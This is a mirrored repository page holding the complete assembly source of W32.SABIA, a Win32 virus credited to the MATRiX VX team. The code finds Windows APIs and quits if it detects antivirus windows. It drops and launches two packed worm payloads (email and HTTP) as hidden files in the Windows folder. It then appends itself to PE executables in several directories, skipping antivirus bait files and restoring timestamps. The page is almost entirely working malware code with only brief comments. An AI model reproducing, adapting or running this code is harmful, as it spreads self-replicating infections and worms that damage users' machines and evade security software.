Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 03:58:34 +00:00
Code Releases Activity
d2cfd8ca7b
vxug-MalwareSourceCode/Win32/Win32.Sabia.asm
vxunderground e6e7892f53
Add files via upload
2020-10-10 22:09:34 -05:00

1342 lines
23 KiB
NASM
Raw Blame History

; W32.SABIA (beta)
.386p
.model flat
.code
jumps
include \VIRUS\TASM50\INCLUDE\SABIA.INC
DEBUG EQU TRUE ; TRUE = message box about infected files,
; and will just copy the worms to the windows
; folder (not install). Only GOAT*.* files are
; infected.
; FALSE = no alert about the infection, infect all PE
; files.
; and will install the 2 worms (email and http).
start:
pushf
pushad
db 233
maybe@001 dd 0
; achar os endereços das api's (funciona em W95/98 ,NT e 2000)
; o arquivo precisa ter importado a api GetProcAddress()
mov eax, 12345678h
org $-4
; imagebase do arquivo (este valor mudará de arquivo p/ arquivo)
img_base0 dd not 00400000h
api@001:
not eax
call api@003
mov esp, [esp+8]
saida@001:
pop dword ptr fs:[0]
pop eax
saida@002:
popad
popf
; o codigo real do arquivo (antes da infecção)
; no futuro vai ter encriptaçao, mas por enquanto
; fica assim mesmo [aproveitem AV ;) ]
dw 25ffh
chamada@001 dd offset sabia@memory
api@003:
push dword ptr fs:[0]
mov fs:[0], esp
mov ecx, [eax+60]
mov edx, [eax+ecx+52]
cmp eax, edx
jne saida@001
api@004:
mov ebp, edx
add eax, ecx
add eax, 128
; eax apontando p/ import table
; ebp contem a imagebase
; a entrada da import table esta em esi
mov esi, [eax]
add esi, ebp
push esi
; o limite da import table esta em edi
mov edi, esi
add edi, [eax+4]
; primeira entrada na import table
mov eax, 'NREK' xor 'NBK' + 'ANA'
xor eax, 'NBK' + 'ANA'
api@007:
mov edx, [esi+12]
cmp [edx+ebp], eax
je api@006
add esi, 20
cmp edx, edi
jb api@007
pop esi
jmp saida@001
; api's importadas pelo KERNEL achadas
api@006:
pop eax
mov edx, [esi+16]
add edx, ebp
mov esi, [esi]
add esi, ebp
cmp eax, esi
je saida@001
mov ecx, edi
; ecx contem o numero de vezes para o loop
sub ecx, eax
xor edi, edi
api@009:
cmp dword ptr [esi], 0
je saida@001
; cmp byte ptr [esi+3], 128
; je api@008
lodsd
add eax, ebp
add eax, 2
mov ebx, 'PteG' xor 'NBK' + 'ANA' + '<:-P'
xor ebx, 'NBK' + 'ANA' + '<:-P'
cmp [eax], ebx
jne api@008
xor ebx, 'PteG' xor 'Acor'
cmp [eax+4], ebx
jne api@008
lea edi,[edi*4]
add edi, edx
; pronto, GetProcAddress em [edi]
; tentar primeiro o NT, depois W95 e depois W2000
call api@010
; Beep() é uma api presente em todos os sistemas e é
; uma palavra bem pequena ;)
db 'Beep',0
api@010:
pop esi
mov ebx, 077F00000h xor 'NBK' + 'ANA' + 'AUUA'
xor ebx, 'NBK' + 'ANA' + 'AUUA'
call api@011
jnz api@012
xor ebx, 077F00000h xor 0BFF70000h
call api@011
jnz api@012
xor ebx, 0BFF70000h xor 077E0000h
call api@011
jnz api@012
jmp saida@001
api@011:
push esi
push ebx
call [edi]
test eax,eax
ret
api@008:
inc edi
dec ecx
jecxz saida@001
jmp api@009
api@012:
; KERNEL em ebx e GetProcAddress em [edi]
call api@014
dd 0,0,0
api@014:
pop eax
push dword ptr [edi]
pop dword ptr [eax]
mov [eax+4], ebx
mov [eax+8], ebp
mov ebp, eax
call api@013
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'DeleteFileA',0
db 'GetFileSize',0
db 'SetFileAttributesA',0
db 'GetCurrentDirectoryA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'UnmapViewOfFile',0
db 'CreateFileA',0
db 'CloseHandle',0
db 'FindClose',0
db 'GetDriveTypeA',0
db 'CopyFileA',0
db 'Sleep',0
db 'GetWindowsDirectoryA',0
db 'GetSystemDirectoryA',0
db 'GetFileAttributesA',0
db 'SetFilePointer',0
db 'SetEndOfFile',0
db 'GetSystemTime',0
db 'lstrlen',0
db 'lstrcat',0
db 'VirtualAlloc',0
db 'CreateMutexA',0
db 'CreateThread',0
db 'GetStartupInfoA',0
db 'CreateProcessA',0
db 'LoadLibraryA',0
db 'GetProcAddress',0
db 'GetFileTime',0
db 'SetFileTime',0
db 'GetTempPathA',0
db 'lstrcpyA',0,'K'
api@013:
pop esi
call api@015
FindFirstFileA dd 0
FindNextFileA dd 0
DeleteFileA dd 0
GetFileSize dd 0
SetFileAttributesA dd 0
GetCurrentDirectoryA dd 0
CreateFileMappingA dd 0
MapViewOfFile dd 0
UnmapViewOfFile dd 0
CreateFileA dd 0
CloseHandle dd 0
FindClose dd 0
GetDriveTypeA dd 0
CopyFileA dd 0
Sleep dd 0
GetWindowsDirectoryA dd 0
GetSystemDirectoryA dd 0
GetFileAttributesA dd 0
SetFilePointer dd 0
SetEndOfFile dd 0
GetSystemTime dd 0
lstrlen dd 0
lstrcat dd 0
VirtualAlloc dd 0
CreateMutexA dd 0
CreateThread dd 0
GetStartupInfoA dd 0
CreateProcessA dd 0
LoadLibraryA dd 0
GetProcAddressA dd 0
GetFileTime dd 0
SetFileTime dd 0
GetTempPathA dd 0
lstrcpy dd 0,0
api@015:
pop edi
api@017:
push esi
push dword ptr [ebp+4]
call [ebp]
stosd
test eax,eax
jz saida@001
api@016:
lodsb
test al,al
jnz api@016
lodsb
dec esi
cmp al, 'K'
jne api@017
; acabamos de achar as api's
mov ebp, [ebp+8]
mov ecx, (offset sabia@end - offset start)
mov esi, 12345678h
org $-4
; onde nosso virus começa na memoria
img_base1 dd 00401000h
mov edi, esi
push edi
add edi, ecx
rep movsb
; converter agora, os endereços para RUNTIME,
; nao mais usando o registrador EBP, como
; é de costume nos virus WIN32.
pop eax
lea edi, [(eax+(offset worm@001 - offset start))]
mov ebx, not 00401000h
not ebx
mov ecx, offset sabia@memory
runtime@001:
dec edi
cmp edi, eax
je sabia@001
cmp dword ptr [edi], ecx
jae runtime@001
cmp [edi], ebx
jb runtime@001
sub [edi], ebx
add [edi], eax
jmp short runtime@001
sabia@001:
mov eax, dword ptr [(offset sabia@end+(offset chamada@001 - offset start))]
mov [chamada@001], eax
mov [maybe@001], (offset saida@002 - (offset maybe@001+4))
; agora que nosso codigo foi convertido para endereços
; RUNTIME, podemos chamar tudo diretamente ;-P
; verificar se existe algum antivirus ativo na memoria
push offset user@001
call [LoadLibraryA]
test eax, eax
jz saida@001
mov [user@002], eax
push offset user@003
push eax
call [GetProcAddressA]
test eax, eax
jz saida@001
mov edi, eax
test eax, eax
jz saida@001
; array de nomes de antivirus
mov esi, offset anti@002
mov ecx, [esi-4]
anti@005:
push ecx
push dword ptr [esi]
push 0
call edi
pop ecx
test eax, eax
jnz saida@001
lodsd
loop anti@005
push offset user@004
push [user@002]
call [GetProcAddressA]
test eax, eax
jz saida@001
mov [user@005], eax
anti@001:
; achar diretorio do windows, copiar o codigo do WORM
push MAX_PATH
mov edi, offset buffer@001
push edi
call [GetWindowsDirectoryA]
test eax,eax
jz saida@001
add edi, eax
push offset buffer@001
push offset buffer@004
call [lstrcpy]
mov eax, '_EI\' xor 'NBK' + 'ANA' + 'TAAT'
xor eax, 'NBK' + 'ANA' + 'TAAT'
stosd
xor eax, '_EI\' xor 'KCAP'
stosd
xor eax, 'KCAP' xor 'EXE.'
stosd
xor al, al
stosb
mov esi, offset worm@001
call depack@001
test eax, eax
jz sabia@002
IF DEBUG EQ FALSE
call play@001
ELSE
ENDIF
call HIDE@001
mov edi, offset buffer@004
push edi
call [lstrlen]
add edi, eax
mov eax, 'NIW\' xor 'NBK' + 'ANA' + '<:O~'
xor eax, 'NBK' + 'ANA' + '<:O~'
stosd
xor eax, 'NIW\' xor 'D.23'
stosd
xor eax, 'D.23' xor 'LL'
stosd
push TRUE
push offset buffer@004
push offset buffer@001
call [CopyFileA]
test eax, eax
jz sabia@002
; devemos infectar a WIN32.DLL agora
push offset buffer@004
push offset buffer@001
call [lstrcpy]
test eax, eax
jz sabia@002
mov eax, [handle@002]
call infectar@001
call HIDE@001
sabia@002:
push MAX_PATH
mov edi, offset buffer@001
push edi
call [GetWindowsDirectoryA]
add edi, eax
mov eax, 'XTM\' xor 'NBK' + 'ANA' + '????'
xor eax, 'NBK' + 'ANA' + '????'
stosd
xor eax, 'XTM\' xor 'XE._'
stosd
xor eax, 'XE._' xor 'E'
stosd
mov esi, offset worm@002
call depack@001
test eax, eax
jz sabia@003
IF DEBUG EQ FALSE
call play@001
ELSE
ENDIF
call HIDE@001
sabia@003:
mov edi, offset buffer@006
push edi
push MAX_PATH
call [GetCurrentDirectoryA]
call sabia@008
mov edi, offset buffer@006
push edi
push MAX_PATH
call [GetTempPathA]
call sabia@008
push MAX_PATH
mov edi, offset buffer@006
push edi
call [GetWindowsDirectoryA]
call sabia@008
jmp saida@001
sabia@008:
add edi, eax
cmp byte ptr [edi-1], '\'
jne sabia@010
dec edi
sabia@010:
IF DEBUG EQ FALSE
STR1 = '*.*\'
STR2 = NULL
STR3 = NULL
ELSE
STR1 = 'AOG\'
STR2 = '*.*T'
STR3 = NULL
ENDIF
mov eax, STR1
stosd
mov eax, STR2
stosd
mov eax, STR3
stosd
push offset buffer@005
push offset buffer@006
call [FindFirstFileA]
mov [handle@007], eax
inc eax
jz sabia@011
sabia@006:
push offset buffer@006
mov esi, offset buffer@001
push esi
call [lstrcpy]
push esi
call [lstrlen]
add esi, eax
sabia@009:
dec esi
cmp byte ptr [esi], '\'
jne sabia@009
mov edi, esi
inc edi
mov esi, offset buffer@005.cFileName
sabia@007:
lodsb
stosb
test al, al
jnz sabia@007
cmp byte ptr [buffer@005.cFileName], '.'
je sabia@004
mov eax, [buffer@005.nFileSizeLow]
call infectar@001
test eax, eax
jnz sabia@005
sabia@004:
push offset buffer@005
push [handle@007]
call [FindNextFileA]
test eax, eax
jnz sabia@006
sabia@005:
push [handle@007]
call [FindClose]
sabia@011:
ret
IO@001:
pushad
mov [handle@002], 0
push 0
push 0
push OPEN_EXISTING
jmp short IO@003
IO@002:
pushad
push 0
push 0
push CREATE_NEW
IO@003:
push offset buffer@001
call [GetFileAttributesA]
mov [handle@008], eax
inc eax
jnz IO@005
mov [handle@008], FILE_ATTRIBUTE_NORMAL
IO@005:
push FILE_ATTRIBUTE_NORMAL
push offset buffer@001
call [SetFileAttributesA]
push 0
push 1
push GENERIC_READ or GENERIC_WRITE
push offset buffer@001
call [CreateFileA]
mov [handle@001], eax
inc eax
jz IOB@005
mov eax, offset handle@009
push eax
add eax, 8
push eax
add eax, 8
push eax
push [handle@001]
call [GetFileTime]
push 0
push [handle@001]
call [GetFileSize]
cmp [handle@002], 0
jne IO@004
mov [handle@002], eax
IO@004:
push 0
push [handle@002]
push 0
push 4
push 0
push [handle@001]
call [CreateFileMappingA]
mov [handle@003], eax
test eax,eax
jz IOB@004
push [handle@002]
push 0
push 0
push 2
push [handle@003]
call [MapViewOfFile]
mov [handle@004], eax
test eax,eax
jz IOB@003
mov [esp+(4*7)], eax
popad
ret
IOB@001:
pushad
IOB@002:
push [handle@004]
call [UnmapViewOfFile]
IOB@003:
push [handle@003]
call [CloseHandle]
push 0
push 0
push [handle@002]
push [handle@001]
call [SetFilePointer]
push [handle@001]
call [SetEndOfFile]
IOB@004:
mov eax, offset handle@009
push eax
add eax, 8
push eax
add eax, 8
push eax
push [handle@001]
call [SetFileTime]
push [handle@001]
call [CloseHandle]
IOB@005:
push [handle@008]
push offset buffer@001
call [SetFileAttributesA]
popad
xor eax,eax
ret
HIDE@001:
pushad
push FILE_ATTRIBUTE_HIDDEN OR FILE_ATTRIBUTE_ARCHIVE
push offset buffer@001
call [SetFileAttributesA]
popad
ret
;***************************************************************
;* aPLib v0.22b - the smaller the better :) *
;* WASM & TASM assembler depacker *
;* *
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
;***************************************************************
_aP_depack_asm:
push ebp
mov ebp, esp
pushad
push ebp
mov esi, [ebp + 8] ; C calling convention
mov edi, [ebp + 12]
cld
mov dl, 80h
literal:
movsb
nexttag:
call getbit
jnc literal
xor ecx, ecx
call getbit
jnc codepair
xor eax, eax
call getbit
jnc shortmatch
mov al, 10h
getmorebits:
call getbit
adc al, al
jnc getmorebits
jnz domatch_with_inc
stosb
jmp short nexttag
codepair:
call getgamma_no_ecx
dec ecx
loop normalcodepair
mov eax,ebp
call getgamma
jmp short domatch
shortmatch:
lodsb
shr eax, 1
jz donedepacking
adc ecx, 2
mov ebp, eax
jmp short domatch
normalcodepair:
xchg eax, ecx
dec eax
shl eax, 8
lodsb
mov ebp, eax
call getgamma
cmp eax, 32000
jae domatch_with_2inc
cmp eax, 1280
jae domatch_with_inc
cmp eax, 7fh
ja domatch
domatch_with_2inc:
inc ecx
domatch_with_inc:
inc ecx
domatch:
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short nexttag
getbit:
add dl, dl
jnz stillbitsleft
mov dl, [esi]
inc esi
adc dl, dl
stillbitsleft:
ret
getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx
getgammaloop:
call getbit
adc ecx, ecx
call getbit
jc getgammaloop
ret
donedepacking:
pop ebp
sub edi, [ebp + 12]
mov [ebp - 4], edi ; return unpacked length in eax
popad
pop ebp
ret
buffer@001 db MAX_PATH dup(0)
name@001 db '_SABIA_',0
dd 8
anti@002 dd offset anti@003
dd offset anti@004
dd offset anti@006
dd offset anti@007
dd offset anti@008
dd offset anti@009
dd offset anti@010
dd offset anti@011
anti@003 db 'AntiViral Toolkit Pro',0
anti@004 db 'AVP Monitor',0
anti@006 db 'Vsstat',0
anti@007 db 'Webscanx',0
anti@008 db 'Avconsol',0
anti@009 db 'McAfee VirusScan',0
anti@010 db 'Vshwin32',0
anti@011 db 'Central do McAfee VirusScan',0
user@001 db 'USER32.DLL',0
user@003 db 'FindWindowA',0
user@004 db 'MessageBoxA',0
aste@001 db '*.*',0
depack@001:
; buffer@001 tem o nome e o path completo do arquivo
; esi tem o offset pro codigo compactado
; criar arquivo padrao de 16K
pushad
mov [handle@002], (1024 * 16)
call IO@002
test eax, eax
jz depack@002
push eax
push esi
call _aP_depack_asm
add esp, 8
; refazendo o tamanho original...
mov [handle@002], eax
call IOB@001
mov eax, [handle@002]
depack@002:
mov [esp+(4*7)], eax
popad
ret
play@001:
pushad
push offset buffer@002
call [GetStartupInfoA]
push offset buffer@003
push offset buffer@002
push 0
push 0
push 67108928h
push 0
push 0
push 0
push offset buffer@001
push 0
call [CreateProcessA]
popad
ret
infectar@001:
; tamanho do arquivo em eax
; arquivos menores de 8Kb nao serao infectados
IF DEBUG EQ TRUE
pushad
push 0
call mena
db 'Arquivo a ser infectado:',0
mena:
push offset buffer@001
push 0
call [user@005]
popad
ELSE
ENDIF
pushad
mov dword ptr [esp+(4*7)], 0
mov [handle@002], eax
mov esi, offset buffer@001
mov ebp, eax
xor edx, edx
mov ecx, 101
cmp eax, ecx
jbe infectar@002
div ecx
test edx, edx
jz infectar@002
cmp ebp, 8192
ja infectar@003
push esi
push esi
call [lstrlen]
sub eax, 5
add esi, eax
lodsd
pop esi
xor eax, 'LD.2'
jz infectar@003
xor eax, 'LD.2' xor 'XE.2'
jnz infectar@002
infectar@003:
; arquivo nao infectado, vamos tentar abri-lo
call IO@001
test eax, eax
jz infectar@002
cmp word ptr [eax], 'ZM'
jne infectar@004
cmp byte ptr [eax+24], 64
jb infectar@004
lea ecx, [ebp+eax]
mov ebx, [eax+60]
add eax, ebx
cmp eax, ecx
jae infectar@004
mov esi, eax
lodsw
xor ax, 'EP' xor '??'
xor ax, '??'
jnz infectar@004
lodsw
lodsw
lodsw
cmp ax, 3
jbe infectar@004
dec ax
; trabalhamos com WORD
and eax,0000ffffh
mov ecx, 40
sub edx, edx
mul ecx
mov ecx, [esi+108]
add eax, ebx
shl ecx, 3
add ecx, eax
add ecx, 120
add ecx, [handle@004]
; ecx está apontando para o header da ultima seção
; seção:
; 0-8 nome
; 8-12 espaço ocupado na memoria
; 12-16 rva da seçao
; 16-20 espaço ocupado no arquivo
; 20-24 offset para o inicio da seçao
; 36-40 flags da seçao
mov eax, [esi+44]
test eax, eax
jz infectar@004
mov edx, eax
add edx, [ecx+12]
cmp dword ptr [ecx+8], 0
je infectar@004
cmp dword ptr [ecx+12], 0
je infectar@004
cmp dword ptr [ecx+16], 0
je infectar@004
cmp dword ptr [ecx+20], 0
je infectar@004
; neste momento:
; eax é a IMAGEBASE do arquivo
; edx é a IMAGEBASE + o RVA da ultima seção
; ecx é um offset para o header da ultima seção
; esi é um offset para o header do PE mais 8 bytes (porque mais 8 bytes ?)
; ebp é o tamanho do arquivo
mov edi, [handle@004]
add ebp, edi
sub ebp, 20
push 0
pop [handle@006]
infectar@005:
inc edi
cmp edi, ebp
jae infectar@004
cmp [handle@006], 20
jae infectar@006
cmp word ptr [edi], 15ffh
jne infectar@005
; evitar instruções como: mov ax, 15ffh
cmp dword ptr [edi+2], eax
jbe infectar@005
cmp dword ptr [edi+2], edx
jae infectar@005
inc [handle@006]
jmp infectar@005
infectar@006:
; aponta para a DWORD
inc edi
; se nós estamos aqui, provavelmente este deve ser um
; arquivo verdadeiro, e nao um teste dos antivirus.
; ele possui mais de 20 chamadas a DWORDS (CALL DWORD PTR [XxX])
; que sao verdadeiras (pelo menos no meu calculo), isso
; indica um codigo com muitas chamadas a api's, os
; arquivos-isca dos antivirus (chamados de GOAT files) geralmente
; tem apenas UMA chamada a api, provavelmente ExitProcess.
; está na hora da infecção :)
mov ebp, [esi+72]
test ebp, ebp
jz infectar@004
lea ebx, [ebp+(offset sabia@memory - offset start)]
infectar@007:
lea ebp, [ebp*2]
mov [esi+72], ebp
cmp ebp, ebx
jb infectar@007
; memória geral aumentada...
mov ebp, [ecx+8]
lea ebx, [ebp+(offset sabia@memory - offset start)]
infectar@008:
lea ebp, [ebp*2]
mov [ecx+8], ebp
cmp ebx, ebp
ja infectar@008
; memoria da seção aumentada...
mov ebp, [ecx+16]
push ebp
push dword ptr [ecx+20]
lea ebx, [ebp+(offset sabia@end - offset start)]
infectar@009:
lea ebp, [ebp*2]
mov [ecx+16], ebp
cmp ebp, ebx
jb infectar@009
; espaço aumentado...
or [ecx+36], GENERIC_READ or GENERIC_WRITE
; imagebase salva
not eax
mov dword ptr [(offset sabia@end + (offset img_base0 - offset start))], eax
not eax
mov dword ptr [(offset sabia@end + (offset img_base1 - offset start))], eax
mov ebp, [ecx+12]
add dword ptr [(offset sabia@end + (offset img_base1 - offset start))], ebp
mov ebp, [esp+4]
add dword ptr [(offset sabia@end + (offset img_base1 - offset start))], ebp
push dword ptr [edi]
pop dword ptr [(offset sabia@end + (offset chamada@001 - offset start))]
; imagebase em eax
push dword ptr [(offset sabia@end + (offset img_base1 - offset start))]
pop dword ptr [edi]
add dword ptr [edi], (offset img_base1 - offset start)
; aumentando arquivo...
mov eax, [handle@002]
add eax, (offset sabia@end - offset start)
sub edx, edx
mov ecx, 101
div ecx
sub edx, edx
inc eax
mul ecx
mov [handle@002], eax
; eax contem o novo valor
call IOB@001
call IO@001
test eax, eax
jz infectar@002
; agora so falta copiar o codigo para dentro do arquivo,
; adicionando os valores que eu tinha salvo na pilha ao
; offset do arquivo mapeado na memoria
; nao acredito que to escrevendo essas linhas até essa hora
; da madruga (são 01:59), foi dia de malhar o judas, essas
; coisas de igreja, cristo e etc... lembrei, páscoa;
; comi meu ovo de chocolate todo uns dias atras, hoje
; fiquei roubando dos parentes :) .
; não sou de ferro, vou dar uma pausa para um cigarrinho...
; até daqui a 5 minutos
; voltei
pop ebp
add eax, ebp
pop ebp
add eax, ebp
mov edi, eax
mov esi, offset sabia@end
mov ecx, (offset sabia@end - offset start)
rep movsb
mov dword ptr [esp+(4*7)], 1
IF DEBUG EQ TRUE
pushad
push 0
call mena1
db 'Arquivo infectado:',0
mena1:
push offset buffer@001
push 0
call [user@005]
popad
ELSE
ENDIF
infectar@004:
call IOB@001
infectar@002:
popad
ret
db 'SABIÁ ViRuS',13,10
db 'Software provide by '
db '[MATRiX] VX TeAm: Ultras, Mort, Nbk, Tgr, Del_Armg0, Anaktos',13,10
db 'Greetz: All VX guy in #virus and Vecna for help us',13,10
db 'Visit us at:',13,10
db 'http://www.coderz.net/matrix',13,10
worm@001:
INCLUDE \VIRUS\SABIA\WORM.INC
worm@002:
INCLUDE \VIRUS\SABIA\MATRiX.INC
sabia@end:
db (offset sabia@end - offset start) dup(0)
user@002 dd 0
user@005 dd 0
buffer@002 STARTUPINFO <0>
buffer@003 PROCESS_INFORMATION <0>
buffer@004 db MAX_PATH dup(0)
buffer@005 WIN32_FIND_DATA <0>
buffer@006 db MAX_PATH dup(0)
handle@001 dd 0
handle@002 dd 0
handle@003 dd 0
handle@004 dd 0
handle@005 dd 0
handle@006 dd 0
handle@007 dd 0
handle@008 dd 0
handle@009 dd 0,0,0,0,0,0
sabia@memory:
dd offset $+4
push 0
API ExitProcess
API GetProcAddress
API GetModuleHandleA
.data
db ?
end start
end
View Git Blame Copy Permalink